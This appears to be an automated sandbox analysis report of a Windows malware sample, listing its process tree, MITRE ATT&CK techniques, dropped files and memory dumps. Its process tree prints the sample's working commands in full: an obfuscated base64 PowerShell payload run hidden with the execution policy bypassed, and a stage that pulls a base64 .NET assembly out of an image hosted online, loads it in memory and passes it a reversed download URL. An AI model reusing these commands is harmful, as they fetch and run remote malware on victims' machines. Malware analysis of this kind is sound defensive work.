◍YQBk⼹ ↶ ㋓ ◺ ◍Cg⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bj⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍bQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍EI⼹ ↶ ㋓ ◺ ◍eQB0⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍cw⼹ ↶ ㋓ ◺ ◍p⼹ ↶ ㋓ ◺ ◍Ds⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍B0⼹ ↶ ㋓ ◺ ◍Hk⼹ ↶ ㋓ ◺ ◍c⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍PQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bv⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍QQBz⼹ ↶ ㋓ ◺ ◍HM⼹ ↶ ㋓ ◺ ◍ZQBt⼹ ↶ ㋓ ◺ ◍GI⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍B5⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍RwBl⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍V⼹ ↶ ㋓ ◺ ◍B5⼹ ↶ ㋓ ◺ ◍H⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍o⼹ ↶ ㋓ ◺ ◍Cc⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bu⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍aQBi⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍SQBP⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍S⼹ ↶ ㋓ ◺ ◍Bv⼹ ↶ ㋓ ◺ ◍G0⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍Ck⼹ ↶ ㋓ ◺ ◍Ow⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍G0⼹ ↶ ㋓ ◺ ◍ZQB0⼹ ↶ ㋓ ◺ ◍Gg⼹ ↶ ㋓ ◺ ◍bwBk⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍PQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍B5⼹ ↶ ㋓ ◺ ◍H⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍u⼹ ↶ ㋓ ◺ ◍Ec⼹ ↶ ㋓ ◺ ◍ZQB0⼹ ↶ ㋓ ◺ ◍E0⼹ ↶ ㋓ ◺ ◍ZQB0⼹ ↶ ㋓ ◺ ◍Gg⼹ ↶ ㋓ ◺ ◍bwBk⼹ ↶ ㋓ ◺ ◍Cg⼹ ↶ ㋓ ◺ ◍JwBW⼹ ↶ ㋓ ◺ ◍EE⼹ ↶ ㋓ ◺ ◍SQ⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍Ck⼹ ↶ ㋓ ◺ ◍LgBJ⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍dgBv⼹ ↶ ㋓ ◺ ◍Gs⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍o⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍bgB1⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍s⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍WwBv⼹ ↶ ㋓ ◺ ◍GI⼹ ↶ ㋓ ◺ ◍agBl⼹ ↶ ㋓ ◺ ◍GM⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bb⼹ ↶ ㋓ ◺ ◍F0⼹ ↶ ㋓ ◺ ◍XQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍Cg⼹ ↶ ㋓ ◺ ◍JwB0⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍u⼹ ↶ ㋓ ◺ ◍Gs⼹ ↶ ㋓ ◺ ◍cwB1⼹ ↶ ㋓ ◺ ◍Hk⼹ ↶ ㋓ ◺ ◍QQBR⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍ZQBi⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍cgBp⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍a⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍t⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍GI⼹ ↶ ㋓ ◺ ◍LgB3⼹ ↶ ㋓ ◺ ◍Hc⼹ ↶ ㋓ ◺ ◍dw⼹ ↶ ㋓ ◺ ◍v⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍OgBz⼹ ↶ ㋓ ◺ ◍H⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍B0⼹ ↶ ㋓ ◺ ◍Gg⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍Cw⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍DE⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍Cw⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍EM⼹ ↶ ㋓ ◺ ◍OgBc⼹ ↶ ㋓ ◺ ◍F⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍cgBv⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍cgBh⼹ ↶ ㋓ ◺ ◍G0⼹ ↶ ㋓ ◺ ◍R⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍YQBc⼹ ↶ ㋓ ◺ ◍Cc⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍s⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍JwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgBv⼹ ↶ ㋓ ◺ ◍HU⼹ ↶ ㋓ ◺ ◍YwBh⼹ ↶ ㋓ ◺ ◍Cc⼹ ↶ ㋓ ◺ ◍L⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍EE⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bk⼹ ↶ ㋓ ◺ ◍Ek⼹ ↶ ㋓ ◺ ◍bgBQ⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍bwBj⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍cwBz⼹ ↶ ㋓ ◺ ◍DM⼹ ↶ ㋓ ◺ ◍Mg⼹ ↶ ㋓ ◺ ◍n⼹ ↶ ㋓ ◺ ◍Cw⼹ ↶ ㋓ ◺ ◍JwBk⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍cwBh⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍aQB2⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bv⼹ ↶ ㋓ ◺ ◍Cc⼹ ↶ ㋓ ◺ ◍KQ⼹ ↶ ㋓ ◺ ◍p⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⼹ ↶ ㋓ ◺ ◍','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ksuyAQ/eb.riah-lleb.www//:sptth' , '1' , 'C:\ProgramData\' , 'tarouca','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fa6d1afd16b33efc5f0283e26c700238

SHA1
97b5f220791901480e3b911b44bf8c000471d1f0

SHA256
8be9f08dbcc69d9e0a10b584adc64489bf320be963bb7719d6faa17ffd926b74

SHA512
43740829451d562e52d5d8a69206ee2d56d9b0cd7d46eac710d3524f8e524d6293505fffc227e77d126d1941f256086db7855fceecce7d31d92ad19d6eed2967

Download Submit
memory/2836-4-0x000007FEF5BFE000-0x000007FEF5BFF000-memory.dmp

Filesize
4KB

Download
memory/2836-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2836-6-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2836-7-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2836-13-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2836-14-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing